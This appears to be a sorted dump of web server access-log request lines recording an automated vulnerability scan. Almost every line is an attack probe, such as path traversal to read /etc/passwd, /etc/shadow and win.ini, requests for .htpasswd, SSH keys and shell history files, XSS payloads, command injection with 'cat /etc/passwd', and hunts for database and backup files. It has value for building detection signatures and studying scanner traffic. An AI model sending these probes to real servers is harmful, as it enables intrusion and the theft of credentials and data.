    GET /..../windows/win.ini HTTP/1.0"
    GET /..../winnt/win.ini HTTP/1.0"
    GET /.access HTTP/1.0"
    GET /.addressbook HTTP/1.0"
    GET /.bash_history HTTP/1.0"
    GET /.bashrc HTTP/1.0"
    GET /.cobalt/sysManage/../admin/.htaccess HTTP/1.0"
    GET /.dirsys/modules/auth/auth.inc.php HTTP/1.0"
    GET /.forward HTTP/1.0"
    GET /.history HTTP/1.0"
    GET /.htaccess HTTP/1.0"
    GET /.html/............./windows/win.ini HTTP/1.0"
    GET /.html/............./winnt/win.ini HTTP/1.0"
    GET /.html/............/windows/win.ini HTTP/1.0"
    GET /.html/............/winnt/win.ini HTTP/1.0"
    GET /.html/........../winnt/win.ini HTTP/1.0"
    GET /.html/......../windows/win.ini HTTP/1.0"
    GET /.html/......../winnt/win.ini HTTP/1.0"
    GET /.htpasswd HTTP/1.0"
    GET /.lynx_cookies HTTP/1.0"
    GET /.mysql_history HTTP/1.0"
    GET /.nsf/../windows/win.ini HTTP/1.0"
    GET /.nsf/../winnt/win.ini HTTP/1.0"
    GET /.passwd HTTP/1.0"
    GET /.pinerc HTTP/1.0"
    GET /.plan HTTP/1.0"
    GET /.proclog HTTP/1.0"
    GET /.procmailrc HTTP/1.0"
    GET /.profile HTTP/1.0"
    GET /.psql_history HTTP/1.0"
    GET /.rhosts HTTP/1.0"
    GET /.sh_history HTTP/1.0"
    GET /.ssh HTTP/1.0"
    GET /.ssh/authorized_keys HTTP/1.0"
    GET /.ssh/known_hosts HTTP/1.0"
    GET /.|./.|./.|./.|./.|./.|./.|./.|./.|./.|./.|./.|./windows/win.ini HTTP/1.0"
    GET /.|./.|./.|./.|./.|./.|./.|./.|./.|./.|./.|./.|./winnt/win.ini HTTP/1.0"
    GET //+CSCOT+/translation?textdomain=csd&prefix=trans&lang=en-us HTTP/1.0"
    GET ///etc/hosts HTTP/1.0"
    GET //Admin_Files/ HTTP/1.1"
    GET //WEB-INF/ HTTP/1.0"
    GET //authorphoto/zorlu40.php?act=ls&d=%2Fetc%2Fvdomainaliases HTTP/1.0"
    GET //authorphoto/zorlu40.php?act=ls&d=%2Fhome%2Fkiddybab%2Fpublic_html%2F HTTP/1.0"
    GET //bitweaver/wiki/rankings.php?style=../../../../../../../../windows/win.ini%00 HTTP/1.0"
    GET //bitweaver/wiki/rankings.php?style=../../../../../../../../winnt/win.ini%00 HTTP/1.0"
    GET //c:/windows/win.ini HTTP/1.0"
    GET //c:/winnt/win.ini HTTP/1.0"
    GET //show.php?dbtable=Accounts&dbfield=Username&dbfieldv=%&dbfields=Id& HTTP/1.0"
    GET /0.2/index.php?page=../../../../../../../../../../etc/passwd%00 HTTP/1.0"
    GET /1.txt HTTP/1.0"
    GET /1024/dashboard.php?act=../../../../../../../etc/passwd%00 HTTP/1.0"
    GET /1024/download.php?item=../uploads/../../../../../etc/passwd HTTP/1.0"
    GET /1024/includes/download.php?item=../uploads/../../../../../etc/passwd HTTP/1.0"
    GET /119/cruscotto/descrizioneservizi/wp.do HTTP/1.0"
    GET /123flash/123flashchat.php HTTP/1.0"
    GET /123flash/phpbb_login_chat.php HTTP/1.0"
    GET /2007/administrator/components/com_joomlaflashfun/admin.joomlaflashfun.php HTTP/1.0"
    GET /2532/activateuser.php HTTP/1.0"
    GET /2532gigs/backup.php HTTP/1.0"
    GET /2532gigs/backup.php?export=1 HTTP/1.0"
    GET /2532gigs/backup.sql HTTP/1.0"
    GET /2Moons/ HTTP/1.0"
    GET /2Moons/CombatReport.php HTTP/1.0"
    GET /2Moons/includes/ HTTP/1.0"
    GET /2Moons/includes/classes/ HTTP/1.0"
    GET /2Moons/includes/classes/class.FlyingFleetHandler.php HTTP/1.0"
    GET /2Moons/includes/classes/class.Lang.php HTTP/1.0"
    GET /2Moons/includes/classes/class.Records.php HTTP/1.0"
    GET /2Moons/includes/common.php HTTP/1.0"
    GET /2Moons/includes/libs/ HTTP/1.0"
    GET /2Moons/includes/libs/Smarty/ HTTP/1.0"
    GET /2Moons/includes/libs/Smarty/Smarty.class.php HTTP/1.0"
    GET /2Moons/includes/libs/Smarty/sysplugins/ HTTP/1.0"
    GET /2Moons/includes/libs/Smarty/sysplugins/smarty_internal_resource_php.php HTTP/1.0"
    GET /2Moons/includes/libs/Smarty/sysplugins/smarty_internal_templatecompilerbase.php HTTP/1.0"
    GET /2Moons/includes/pages/ HTTP/1.0"
    GET /2Moons/includes/pages/ShowTopKB.php HTTP/1.0"
    GET /2Moons/includes/pages/adm/ShowModVersionPage.php HTTP/1.0"
    GET /2Moons/pages/ HTTP/1.0"
    GET /2Moons/pages/adm/ HTTP/1.0"
    GET /2moons/ HTTP/1.0"
    GET /3656m/ HTTP/1.0"
    GET /394/Application%20Website%20Code/application/ HTTP/1.0"
    GET /394/Application%20Website%20Code/application/DbConn.inc HTTP/1.0"
    GET /394/application/ HTTP/1.0"
    GET /3com/utility.cgi?testType=1&IP=aaa || cat /etc/passwd HTTP/1.0"
    GET /3crads/config.bin HTTP/1.0"
    GET /4.2/admin/FileServer.php HTTP/1.0"
    GET /4DBin//../windows/win.ini HTTP/1.0"
    GET /4DBin/
    /../winnt/win.ini HTTP/1.0"
    GET /4DBin//C:/windows/win.ini HTTP/1.0"
    GET /4DBin/
    /C:/winnt/win.ini HTTP/1.0"
    GET /4images/ HTTP/1.0"
    GET /5star_rating/admin/control_panel_sample.php HTTP/1.0"
    GET /60cycleCMS.2.5.2/private/changeUserPass.php HTTP/1.0"
    GET /60cycleCMS/common/sqlConnect.php HTTP/1.0"
    GET /60cycleCMS/news.php HTTP/1.0"
    GET /60cycleCMS/private/changeUserPass.php HTTP/1.0"
    GET /60cycleCMS/submitComment.php HTTP/1.0"
    GET /8pixel/App_Data/sb.mdb HTTP/1.0"
    GET /99articles/ HTTP/1.0"
    GET /:/ HTTP/1.0"
    GET /<<<<<<<<<<<< HTTP/1.0"
    GET /hello.html HTTP/1.1"
    GET /<script>alert(1)</script>.html HTTP/1.1"
    GET /?<//STYLE=x:e/**/xpression(alert('asp-audit'))> HTTP/1.1" 200 366
    GET /?<script>alert(1)</script> HTTP/1.1" 200 366
    GET /?language=../../../../../../../etc/passwd%00 HTTP/1.0" 200 366
    GET /?language=../../../../../../../etc/passwd%00 HTTP/1.0" 200 366 "-" "-"
    GET /?nx=@@ HTTP/1.1" 200 366
    GET /?nx=@@ HTTP/1.1" 200 366 "-"
    GET /?sql_debug=1 HTTP/1.0" 200 366
    GET /?sql_debug=1 HTTP/1.0" 200 366 "-" "-"
    GET /?subMnuItem=../../../../../../../../etc/passwd%00 HTTP/1.0" 200 366
    GET /?subMnuItem=../../../../../../../../etc/passwd%00 HTTP/1.0" 200 366 "-" "-"
    GET /?template=../../../../../../../../../../etc/passwd HTTP/1.0" 200 366
    GET /?template=../../../../../../../../../../etc/passwd HTTP/1.0" 200 366 "-" "-"
    GET /?wp-cs-dump HTTP/1.0" 200 366
    GET /?wp-cs-dump HTTP/1.0" 200 366 "-" "-"
    GET /?wp-html-rend HTTP/1.0" 200 366
    GET /?wp-html-rend HTTP/1.0" 200 366 "-" "-"
    GET /?wp-start-ver HTTP/1.0" 200 366
    GET /?wp-start-ver HTTP/1.0" 200 366 "-" "-"
    GET /?wp-stop-ver HTTP/1.0" 200 366
    GET /?wp-stop-ver HTTP/1.0" 200 366 "-" "-"
    GET /?wp-uncheckout HTTP/1.0" 200 366
    GET /?wp-uncheckout HTTP/1.0" 200 366 "-" "-"
    GET /?wp-usr-prop HTTP/1.0" 200 366
    GET /?wp-usr-prop HTTP/1.0" 200 366 "-" "-"
    GET /?wp-ver-diff HTTP/1.0" 200 366
    GET /?wp-ver-diff HTTP/1.0" 200 366 "-" "-"
    GET /?wp-ver-info HTTP/1.0" 200 366
    GET /?wp-ver-info HTTP/1.0" 200 366 "-" "-"
    GET /?wp-verify-link HTTP/1.0" 200 366
    GET /?wp-verify-link HTTP/1.0" 200 366 "-" "-"
    GET /@mail/util.php HTTP/1.0"
    GET /ACGVnews/header.php HTTP/1.0"
    GET /ACSBLOG.MDB HTTP/1.0"
    GET /ACollab/sign_in.php HTTP/1.0"
    GET /ADMIN/header.php?language=/../../../../../etc/passwd%00 HTTP/1.0"
    GET /AES/modules/auth/phpsecurityadmin/include/logout.php HTTP/1.0"
    GET /AL-Athkar/Main.php HTTP/1.0"
    GET /AL-Athkar/count.php HTTP/1.0"
    GET /AL-Athkar/get.php HTTP/1.0"
    GET /AL-Caricatier/V.2.5/cat_viewed.php HTTP/1.0"
    GET /AL-Caricatier/cat_viewed.php HTTP/1.0"
    GET /ASP-CMS_v100.mdb HTTP/1.0"
    GET /ASP-DEV/ubbs.mdb HTTP/1.0"
    GET /ATutor/documentation/common/frame_toc.php HTTP/1.0"
    GET /ATutor/documentation/common/print.php HTTP/1.0"
    GET /ATutor/documentation/common/search.php HTTP/1.0"
    GET /ATutor/documentation/common/vitals.inc.php HTTP/1.0"
    GET /ATutor/include/classes/module/module.class.php HTTP/1.0"
    GET /ATutor/include/classes/phpmailer/class.phpmailer.php HTTP/1.0"
    GET /About/SC_About.htm HTTP/1.0"
    GET /AcceptIP.txt HTTP/1.0"
    GET /AddAsset.php HTTP/1.0"
    GET /Admin.po?proceed=yes HTTP/1.0"
    GET /Administr8/admin/includes/global.php HTTP/1.0"
    GET /AfariaAdmin/ErrorHandler.aspx?msg=csrf&ReloadLink=False HTTP/1.0"
    GET /AfariaAdmin/WebForms/ErrorHandler.aspx?msg=csrf&ReloadLink=False HTTP/1.0"
    GET /Agora/modules/Wiki/Wiki.php HTTP/1.0"
    GET /AlberT-EasySite/AES/modules/auth/phpsecurityadmin/include/logout.php HTTP/1.0"
    GET /AlbumArt_/ HTTP/1.0"
    GET /AllNames.html HTTP/1.0"
    GET /AntiSpamGateway/UPM/English/login/login.asp HTTP/1.0"
    GET /App_Data/sb.mdb HTTP/1.0"
    GET /Application%20Website%20Code/ HTTP/1.0"
    GET /Application%20Website%20Code/application/ HTTP/1.0"
    GET /ArticlesTableview.asp HTTP/1.0"
    GET /Audits/bilboblog/footer.php?enable_cache=false HTTP/1.0"
    GET /Audits/bilboblog/pagination.php HTTP/1.0"
    GET /AzDG.template.inc.php HTTP/1.0"
    GET /BW/ HTTP/1.0"
    GET /BackupCfg.html HTTP/1.0"
    GET /BackupSchedule.do HTTP/1.0"
    GET /Base/Application.php HTTP/1.0"
    GET /Bcwb/system/default.css.php HTTP/1.0"
    GET /Beautifier/Core.php HTTP/1.0"
    GET /BizTalkServerDocs/ HTTP/1.0"
    GET /BizTalkServerRepository/ HTTP/1.0"
    GET /BizTalkTracking/ HTTP/1.0"
    GET /Boum/alboretum/action/actionaliste.php HTTP/1.0"
    GET /Boum/alboretum/action/utilitaires.php HTTP/1.0"
    GET /Boutiques/ HTTP/1.0"
    GET /BusinessProcessBI/axis2-web/HappyAxis.jsp HTTP/1.0"
    GET /C:/ HTTP/1.0"
    GET /C:\Windows\win.ini HTTP/1.0"
    GET /C:\windows\win.ini HTTP/1.0"
    GET /CFIDE/administrator/enter.cfm?locale=../../../../../../../../../../ColdFusion8/lib/password.properties%00en HTTP/1.0"
    GET /CFIDE/scripts/ajax/FCKeditor/editor/filemanager/connectors/cfm" HTTP/1.0"
    GET /CGI-Bin/frame.html HTTP/1.0"
    GET /CGI-Bin/frame.html?Mehr=xxx&SUPER=x HTTP/1.0"
    GET /CHANGELOG HTTP/1.0"
    GET /CL2F9R1A2C1N.mdb HTTP/1.0"
    GET /CONTENTCustomizer/dialog.php HTTP/1.0"
    GET /CP/...../account_manage.php/login.php HTTP/1.0"
    GET /CSLH2/txt-db-api/resultset.php HTTP/1.0"
    GET /CSLH2/txt-db-api/sql.php HTTP/1.0"
    GET /CSLH2/txt-db-api/stringparser.php HTTP/1.0"
    GET /CSLH2/txt-db-api/util.php HTTP/1.0"
    GET /CSUserCGI.exe HTTP/1.0"
    GET /Calcium40.pl HTTP/1.0"
    GET /Campaign/campaignDetails.do HTTP/1.0"
    GET /Campaign/main.do HTTP/1.0"
    GET /Campaign/runAllFlowchart.do HTTP/1.0"
    GET /Campaign/updateOfferTemplatePage.do HTTP/1.0"
    GET /Campaign/updateOfferTemplateSubmit.do HTTP/1.0"
    GET /Carbon2.4d.mdb HTTP/1.0"
    GET /CartXpress/admin/backup/login.php?action=backup HTTP/1.0"
    GET /CartXpress/admin/backup/login.php?action=backupnow HTTP/1.0"
    GET /CartXpress/admin/backup/login.php?action=download&file=db_comm-20100301222138.sql HTTP/1.0"
    GET /CartXpress/admin/file_manager.php/login_admin.php/login.php?action=download&filename=/includes/_includes_configure.php HTTP/1.0"
    GET /CheckUpload.php HTTP/1.0"
    GET /Class/class/export.php?ftype=/../../etc/passwd HTTP/1.0"
    GET /Class/class/scripts/export.php?ftype=/../../etc/passwd HTTP/1.0"
    GET /Class/export.php?ftype=/../../etc/passwd HTTP/1.0"
    GET /ClickAndEmailDEMO/admin_main.asp HTTP/1.0"
    GET /ClientServlet HTTP/1.0"
    GET /CmcApp/App/sesInfo.jsp HTTP/1.0"
    GET /ComGetLogFile.php3?fn=../../../../windows/system.ini HTTP/1.0"
    GET /ComGetLogFile.php3?fn=../../../../windows/win.ini HTTP/1.0"
    GET /ComGetLogFile.php3?fn=../../../../winnt/system.ini HTTP/1.0"
    GET /ComGetLogFile.php3?fn=../../../../winnt/win.ini HTTP/1.0"
    GET /Comersus/comersus.mdb HTTP/1.0"
    GET /Comersus/database/comersus.mdb HTTP/1.0"
    GET /Commence/admin/includes/include_all_fns.php HTTP/1.0"
    GET /Commence/admin/phase/include_all_phase.php HTTP/1.0"
    GET /Commence/admin/phase/phase1.php HTTP/1.0"
    GET /Commence/admin/phase/phase2.php HTTP/1.0"
    GET /Commence/admin/phase/phase3.php HTTP/1.0"
    GET /Commence/admin/phase/phase4.php HTTP/1.0"
    GET /Commence/admin/phase/phasebase.php HTTP/1.0"
    GET /Commence/includes/db_connect.php HTTP/1.0"
    GET /Commence/includes/include_all_fns.php HTTP/1.0"
    GET /Commence/includes/main_fns.php HTTP/1.0"
    GET /Commence/includes/output_fns.php HTTP/1.0"
    GET /Commence/includes/page_includes/page.php HTTP/1.0"
    GET /Commence/includes/page_includes/pagebase.php HTTP/1.0"
    GET /Commence/includes/user_authen_fns.php HTTP/1.0"
    GET /Commence/reviewer/includes/include_all_fns.php HTTP/1.0"
    GET /Commence/reviewer/phase/include_all_phase.php HTTP/1.0"
    GET /Commence/reviewer/phase/phase1.php HTTP/1.0"
    GET /Commence/reviewer/phase/phase2.php HTTP/1.0"
    GET /Commence/reviewer/phase/phase3.php HTTP/1.0"
    GET /Commence/reviewer/phase/phase4.php HTTP/1.0"
    GET /Commence/reviewer/phase/phasebase.php HTTP/1.0"
    GET /Commence/user/phase/include_all_phase.php HTTP/1.0"
    GET /Commence/user/phase/phase1.php HTTP/1.0"
    GET /Commence/user/phase/phase2.php HTTP/1.0"
    GET /Commence/user/phase/phase3.php HTTP/1.0"
    GET /Commence/user/phase/phase4.php HTTP/1.0"
    GET /Commence/user/phase/phasebase.php HTTP/1.0"
    GET /CommonClientSideJS.js HTTP/1.0"
    GET /Conference/Audio/AudioResourceContainer.asp HTTP/1.0"
    GET /Config.bin HTTP/1.0"
    GET /Connections/blog.sql HTTP/1.0"
    GET /Copy of checkout.php HTTP/1.0"
    GET /Copy%20of%20checkout.php HTTP/1.0"
    GET /Core/core.inc.php HTTP/1.0"
    GET /Corporate/ HTTP/1.0"
    GET /Csite/OLD_CSITE/cgi-bin/finger.cgi?finger=root HTTP/1.0"
    GET /DB4Web/ HTTP/1.0"
    GET /DBSeed.xml HTTP/1.0"
    GET /DEADJOE HTTP/1.0"
    GET /DOC/ HTTP/1.0"
    GET /DON3/applications/don3_requiem.don3app/don3_requiem.php HTTP/1.0"
    GET /DON3/applications/frontpage.don3app/frontpage.php HTTP/1.0"
    GET /DUdirectory/admin/default.asp HTTP/1.0"
    GET /DUpoll/Dupoll.mdb HTTP/1.0"
    GET /DUpoll/private/Dupoll.mdb HTTP/1.0"
    GET /Data/Dvbbs7.mdb HTTP/1.0"
    GET /Data/settings.xml HTTP/1.0"
    GET /Data2F9R1A2C1N.mdb HTTP/1.0"
    GET /DataBase/Carbon2.4d.mdb HTTP/1.0"
    GET /Database.mdb HTTP/1.0"
    GET /Database/listpics.mdb HTTP/1.0"
    GET /Debug_command_page.asp HTTP/1.0"
    GET /Desktop.ini HTTP/1.0"
    GET /DigitalScribe/ HTTP/1.0"
    GET /Display?what=../../../../../windows/win.ini HTTP/1.0"
    GET /Display?what=../../../../../winnt/win.ini HTTP/1.0"
    GET /DocuSafe/SearchR.asp HTTP/1.0"
    GET /Doom/engine/exec/startup.inc.php HTTP/1.0"
    GET /Dorsa/Default
    .aspx HTTP/1.0"
    GET /Download.php?url=../../../../../../../etc/passwd HTTP/1.0"
    GET /DownloadModule.php?file=../../../../../../../../etc/passwd%00 HTTP/1.0"
    GET /DownloadReportSource?dirType=webapp&fileDir=reports&fileName=reportParaExample.xml....................\windows\win.ini HTTP/1.0"
    GET /DownloadReportSource?dirType=webapp&fileDir=reports................\windows\win.ini%00reports&fileName=reportParaExample.xml HTTP/1.0"
    GET /Downloads/voteinclude.php HTTP/1.0"
    GET /Dupoll.mdb HTTP/1.0"
    GET /Dvbbs7.mdb HTTP/1.0"
    GET /DynamicQuery/EjbMediatorWeb/ HTTP/1.0"
    GET /EZPhotoSales/ HTTP/1.0"
    GET /Engine HTTP/1.0"
    GET /Enthusiast/show_joined.php HTTP/1.0"
    GET /Enthusiast/show_owned.php HTTP/1.0"
    GET /ErrorHandler.aspx?msg=csrf&ReloadLink=False HTTP/1.0"
    GET /Ex/modules/threadstop/threadstop.php?exbb[default_lang]=../../../../../install.php%00 HTTP/1.0"
    GET /Exero_CMS_1-0-1/themes/Default/custompage.php HTTP/1.0"
    GET /Exero_CMS_1-0-1/themes/Default/errors/404.php HTTP/1.0"
    GET /Exero_CMS_1-0-1/themes/Default/members/memberslist.php HTTP/1.0"
    GET /Exero_CMS_1-0-1/themes/Default/members/profile.php HTTP/1.0"
    GET /Exero_CMS_1-0-1/themes/Default/news/fullview.php HTTP/1.0"
    GET /Exero_CMS_1-0-1/themes/Default/news/index.php HTTP/1.0"
    GET /Exero_CMS_1-0-1/themes/Default/nopermission.php HTTP/1.0"
    GET /Exero_CMS_1-0-1/themes/Default/usercp/avatar.php HTTP/1.0"
    GET /Exero_CMS_1-0-1/themes/Default/usercp/editpassword.php HTTP/1.0"
    GET /Exero_CMS_1-0-1/themes/Default/usercp/index.php HTTP/1.0"
    GET /ExportCurrentSettings?exportsetting=1 HTTP/1.0"
    GET /FAQ12096.aspx?aspxerrorpath=/ HTTP/1.1"
    GET /FILE1.PHP HTTP/1.0"
    GET /FILE
    1.PHT HTTP/1.0"
    GET /FastJSData.cgi?id1=sh2kerr&id2=91|cat%20/etc/passwd HTTP/1.0"
    GET /FileBrowser.php HTTP/1.0"
    GET /Film/Spillefilm/ HTTP/1.0"
    GET /FireAnt/db/user.tsv HTTP/1.0"
    GET /FolderManager/FolderManager.aspx HTTP/1.0"
    GET /Forms/page_CfgDevInfo_Set HTTP/1.0"
    GET /Forms/rpRManage_1?ACL_active=0 HTTP/1.0"
    GET /Forums/attachment.php HTTP/1.0"
    GET /Forums/auth.php HTTP/1.0"
    GET /GET_CONFIG HTTP/1.0"
    GET /GHH%20v1.1%20-%20passwd.txt/passwd.txt HTTP/1.0"
    GET /GLOBAL.ASA HTTP/1.0"
    GET /GTcatalog/ HTTP/1.0"
    GET /GW5/GWWEB.EXE?GET-CONTEXT&HTMLVER=AAA HTTP/1.0"
    GET /GW5/GWWEB.EXE?HELP=badrequest HTTP/1.0"
    GET /GWWEB.EXE?GET-CONTEXT&HTMLVER=AAA HTTP/1.0"
    GET /GWWWEB.EXE?HELP=badrequest HTTP/1.0"
    GET /GWextranet/ HTTP/1.0"
    GET /Gallery/ HTTP/1.0"
    GET /Gallery/phpThumb.php?src=../../../etc/passwd HTTP/1.0"
    GET /GnuBoard/bbs/poll_result.php?po_id=177&skin_dir=../../../../../../../../etc/passwd%00 HTTP/1.0"
    GET /GnuBoard/common.php?g4_path=../../../../../../etc/passwd%00 HTTP/1.0"
    GET /GnuBoard/poll_result.php?po_id=177&skin_dir=../../../../../../../../etc/passwd%00 HTTP/1.0"
    GET /GoogleSearch.php?APP[path][lib]=/etc/passwd%00 HTTP/1.0"
    GET /HP%20sysprep.inf HTTP/1.0"
    GET /HyperWave/ HTTP/1.0"
    GET /IBM%20sysprep.inf HTTP/1.0"
    GET /IWN/IWNewsletter10.mdb HTTP/1.0"
    GET /IlohaMail/ HTTP/1.0"
    GET /ImageVue/ HTTP/1.0"
    GET /Info.live.htm HTTP/1.0"
    GET /InfoViewApp/jsp/common/actionNav.faces HTTP/1.0"
    GET /InfoViewApp/jsp/common/actionNav.faces. HTTP/1.0"
    GET /InfoViewApp/jsp/common/error.jsp HTTP/1.0"
    GET /InfoViewApp/logon.jsp HTTP/1.0"
    GET /InterceptorClientServlet HTTP/1.0"
    GET /JOWAMP_files/JOWAMP_ShowPage.php HTTP/1.0"
    GET /JSPWikiPath/Edit.jsp?page=Main&editor=../../../rss HTTP/1.0"
    GET /JSPWikiPath/Edit.jsp?page=User&editor=../../../Install HTTP/1.0"
    GET /JSPWikiPath/Edit.jsp?page=User&editor=../../../admin/SecurityConfig HTTP/1.0"
    GET /JWS_WebService.jsp HTTP/1.0"
    GET /Juniors-Cheesecake-Foxwoods/ HTTP/1.0"
    GET /KhaledMuratList/Database/listpics.mdb HTTP/1.0"
    GET /LOGIN.inc HTTP/1.0"
    GET /LightBlog9.6/view_member.php?username=../../../../../../../../../../etc/passwd%00 HTTP/1.0"
    GET /LightNEasy.php?page=../../../../../../../include.txt%00 HTTP/1.0"
    GET /LightNEasy/thumbsup.php HTTP/1.0"
    GET /LightNEasy_1_2_2_flat/LightNEasy.php?page=../../../../../../../include.txt%00 HTTP/1.0"
    GET /Listadeparametros.html HTTP/1.0"
    GET /Lite-serve/ HTTP/1.0"
    GET /METADATA/ HTTP/1.0"
    GET /Mamblog/admin.mamblog.php HTTP/1.0"
    GET /MamboV4.6RC2/components/com_extcalendar/admin_events.php HTTP/1.0"
    GET /MamboV4.6RC2/components/com_extcalendar/extcalendar.php HTTP/1.0"
    GET /MamboV4.6RC2/components/com_extcalendar/lib/mail.inc.php HTTP/1.0"
    GET /Mdoc/view-sourcecode.php HTTP/1.0"
    GET /MessagingManager/ HTTP/1.0"
    GET /MitiSoft.mdb HTTP/1.0"
    GET /NOCC/ HTTP/1.0"
    GET /NUL.REM HTTP/1.1"
    GET /NULL.printer HTTP/1.0"
    GET /NetDemo2/OpenFile.aspx?file=../../../../../../../../../windows/win.ini HTTP/1.0"
    GET /NetDemo2/OpenFile.aspx?file=../../../../../../../../../winnt/win.ini HTTP/1.0"
    GET /NetDemo2/OpenFile.aspx?file=../../../../../../../../windows/win.ini HTTP/1.0"
    GET /NetDemo2/OpenFile.aspx?file=../../../../../../../../winnt/win.ini HTTP/1.0"
    GET /NetDemo2/html.aspx?file=../../../../../../../../../winnt/win.ini HTTP/1.0"
    GET /NetDemo2/html.aspx?file=../../../../../../../../winnt/win.ini HTTP/1.0"
    GET /Net_DNS/DNS/RR.php HTTP/1.0"
    GET /News/comments.php HTTP/1.0"
    GET /Newuser=Image=../../database/rbsserv.mdb HTTP/1.0"
    GET /NmConsole/DeviceSelection.asp HTTP/1.0"
    GET /NmConsole/utility/RenderMap.asp HTTP/1.0"
    GET /NmConsole/utility/RenderMap.asp?nDeviceGroupID=2 HTTP/1.0"
    GET /NuclearBB/tasks/send_queued_emails.php HTTP/1.0"
    GET /OLD_CSITE/cgi-bin/finger.cgi?finger=root HTTP/1.0"
    GET /OmegaBill_v1.0_Build6/clients/download_invoice.php HTTP/1.0"
    GET /OnlineViewing/ HTTP/1.0"
    GET /OpenFile.aspx?file=../../../../../../../../../windows/win.ini HTTP/1.0"
    GET /OpenFile.aspx?file=../../../../../../../../../winnt/win.ini HTTP/1.0"
    GET /OpenFile.aspx?file=../../../../../../../../windows/win.ini HTTP/1.0"
    GET /OpenFile.aspx?file=../../../../../../../../winnt/win.ini HTTP/1.0"
    GET /OpenKM/ HTTP/1.0"
    GET /OpenTopic HTTP/1.0"
    GET /OvCgi/ HTTP/1.0"
    GET /OvCgi/Toolbar.exe HTTP/1.0"
    GET /PHP/includes/header.inc.php HTTP/1.0"
    GET /PHPDJ_v05/dj/djpage.php HTTP/1.0"
    GET /PHPLibrary-1.5.3/Description.php HTTP/1.0"
    GET /PHPLibrary-1.5.3/example/lib/grid3.lib.php HTTP/1.0"
    GET /PHP_CON/Exchange/include.php HTTP/1.0"
    GET /PSF/base.inc.php?DAO_DIR=/etc/passwd%00 HTTP/1.0"
    GET /PSF/lib/base.inc.php?DAO_DIR=/etc/passwd%00 HTTP/1.0"
    GET /PhotoCart/adminprint.php HTTP/1.0"
    GET /PhpDocumentor/ HTTP/1.0"
    GET /Pickle/download.php?img=1&file=../../../../../../../../../../../../../etc/passwd&rotation=0&img=0 HTTP/1.0"
    GET /Pickle/download.php?img=1&file=../../../../../../../../../../../../../etc/shadow&rotation=0&img=0 HTTP/1.0"
    GET /Pickle/src/download.php?img=1&file=../../../../../../../../../../../../../etc/passwd&rotation=0&img=0 HTTP/1.0"
    GET /Pickle/src/download.php?img=1&file=../../../../../../../../../../../../../etc/shadow&rotation=0&img=0 HTTP/1.0"
    GET /Picssolution/install/config.php HTTP/1.0"
    GET /Platinum 7.6.b.5 Php_Nuke_Fusion/public_html/modules/Forums/favorites.php HTTP/1.0"
    GET /PluginController.php?path=..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2fwindows%2fwin.ini%00 HTTP/1.0"
    GET /PointRollAds.htm HTTP/1.0"
    GET /PointRollAds.html HTTP/1.0"
    GET /Private_Messages/functions.php HTTP/1.0"
    GET /Private_Messages/index.php HTTP/1.0"
    GET /Private_Messages/read.php HTTP/1.0"
    GET /Private_Messages/reply.php HTTP/1.0"
    GET /ProductCart/pc/msg.asp?|-|0|404_Object_Not_Found HTTP/1.0"
    GET /PwP2.5.1.1/?page=../../../../../../../../etc/passwd HTTP/1.0"
    GET /README.TXT HTTP/1.0"
    GET /RELEASE-NOTES.txt HTTP/1.0"
    GET /RTE_popup_link.asp HTTP/1.0"
    GET /Read Me.txt HTTP/1.0"
    GET /Read%20Me.txt HTTP/1.0"
    GET /Read\ Me.txt HTTP/1.0"
    GET /Read\Me.txt HTTP/1.0"
    GET /ReleaseNotes.html HTTP/1.0"
    GET /Remote/ HTTP/1.0"
    GET /Request.sd HTTP/1.0"
    GET /SAP/ HTTP/1.0"
    GET /SAP/BW/ HTTP/1.0"
    GET /SAP/BW/DOC/ HTTP/1.0"
    GET /SAP/BW/DOC/METADATA/ HTTP/1.0"
    GET /SAP/BW/DOC/METADATA/?page=1111%3Cobject%20data=%22data:text/html;base64;;PHNjcmlwdD5hbGVydCgiSGVsbG8iKTs8L3NjcmlwdD4=%22%3E%3C/object%3E HTTP/1.0"
    GET /SERVERS/Shared/signers.cfg HTTP/1.0"
    GET /SERVERS/Web/Tomcat/login.conf HTTP/1.0"
    GET /SERVERS/Web/Tomcat/usercenter/WEB-INF/login.conf HTTP/1.0"
    GET /SERVERS/Web/Tomcat/usercenter/login.conf HTTP/1.0"
    GET /SERVERS/Web/login.conf HTTP/1.0"
    GET /SERVERS/login.conf HTTP/1.0"
    GET /SERVERS/signers.cfg HTTP/1.0"
    GET /SHARE1/ HTTP/1.0"
    GET /SHARE1/images/ HTTP/1.0"
    GET /SHARE1/images/Sysprep/ HTTP/1.0"
    GET /SHARE1/images/Sysprep/sysprep HTTP/1.0"
    GET /SHARE1/images/sysprep HTTP/1.0"
    GET /SHARE1/sysprep HTTP/1.0"
    GET /SHARE2/ HTTP/1.0"
    GET /SHARE3/ HTTP/1.0"
    GET /SHARE4/ HTTP/1.0"
    GET /SHARE5/ HTTP/1.0"
    GET /SHARE6/ HTTP/1.0"
    GET /SHARE7/ HTTP/1.0"
    GET /SHARE8/ HTTP/1.0"
    GET /SHARE9/ HTTP/1.0"
    GET /SIPsettingsLine1.html HTTP/1.0"
    GET /SPIP-v1-7-2/inc-calcul.php3 HTTP/1.0"
    GET /SQuery/gameSpy2.php HTTP/1.0"
    GET /Satellite.php?op=modload&name=../../../../../../etc/passwd&file=index HTTP/1.0"
    GET /SaveCfgFile.cgi HTTP/1.0"
    GET /Script/download2.php?file=../../../../../../../../../../../etc/passwd HTTP/1.0"
    GET /Script/rss.php?rss=../../../../etc/passwd%00 HTTP/1.0"
    GET /Script/update/index.php?update=update=../../../../etc/passwd%00 HTTP/1.0"
    GET /ScriptPage//index.php?lang=../../../../../../../../etc/passwd%00 HTTP/1.0"
    GET /ScriptPage//register.php?lang=../../../../../../../../etc/passwd%00 HTTP/1.0"
    GET /ScriptPage/login.php?lang=../../../../../../../../etc/passwd%00 HTTP/1.0"
    GET /ScriptPage/statistics.php?lang=../../../../../../../../etc/passwd%00 HTTP/1.0"
    GET /Scripts/abtpportal0.1.0/includes/esqueletos/skel_null.php?ABTPV_BLOQUE_CENTRAL=/etc/passwd HTTP/1.0"
    GET /SearchR.asp HTTP/1.0"
    GET /SecCheck/..%252f..%252f../ext.ini HTTP/1.0"
    GET /SecCheck/..%255c..%255c../ext.ini HTTP/1.0"
    GET /SecCheck/..%2f../ext.ini HTTP/1.0"
    GET /SecurityGateway.dll HTTP/1.0"
    GET /ServerKey.pem HTTP/1.0"
    GET /SetHwPC4800.shm?ifIndex=2 HTTP/1.0"
    GET /SetSecurity.shm HTTP/1.0"
